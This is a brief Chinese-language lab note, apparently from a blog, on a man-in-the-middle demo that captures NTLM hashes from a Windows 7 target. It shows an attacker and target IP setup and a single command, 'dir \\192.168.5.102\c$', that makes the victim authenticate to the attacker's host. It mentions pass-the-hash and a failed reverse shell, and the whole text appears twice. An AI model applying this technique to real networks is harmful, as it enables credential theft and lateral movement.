简单来说就是中间人攻击,窃取凭证
这里简单示范
攻击机
kali 192.168.5.102
靶机 win7
192.168.5.155
kali配置如下
靶机执行
dir \\192.168.5.102\c$
无法弹回shell,不知道为什么,但已能获取到hash。即可pth
利用较简单,重点是如何进行欺骗。
简单来说就是中间人攻击,窃取凭证
这里简单示范
攻击机
kali 192.168.5.102
靶机 win7
192.168.5.155
kali配置如下
靶机执行
dir \\192.168.5.102\c$
无法弹回shell,不知道为什么,但已能获取到hash。即可pth
利用较简单,重点是如何进行欺骗。